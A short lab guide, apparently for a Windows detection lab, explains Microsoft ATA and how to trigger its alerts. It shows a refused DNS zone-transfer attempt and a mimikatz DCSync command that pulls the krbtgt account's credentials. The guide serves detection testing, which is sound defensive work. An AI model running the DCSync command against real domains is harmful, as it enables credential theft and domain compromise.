Advanced Threat Analytics (ATA) is an on-premises platform that helps protect your enterprise from multiple types of advanced targeted cyber attacks and insider threats.
Having Microsoft ATA allows defenders to test detections and gain a better sense of ATA’s capabilities. It allows offensive security professionals to determine what tools and/or techniques will be detected by Microsoft ATA.
To attempt a zone transfer: From a cmd.exe prompt, run
C:\Users\vagrant>nslookup Default Server: UnKnown Address: 192.168.38.102 > ls -d windomain.local [UnKnown] *** Can't list domain windomain.local: Query refused The DNS server refused to transfer the zone windomain.local to your computer. If this is incorrect, check the zone transfer security settings for windomain.local on the DNS server at IP address 192.168.38.102.
To attempt to do a DCSync:
c:\tools\mimikatz\x64\mimikatz.exe lsadump::dcsync /domain:windomain.local /user:krbtgt
Both of these activities should trigger MSATA alerts within a few minutes.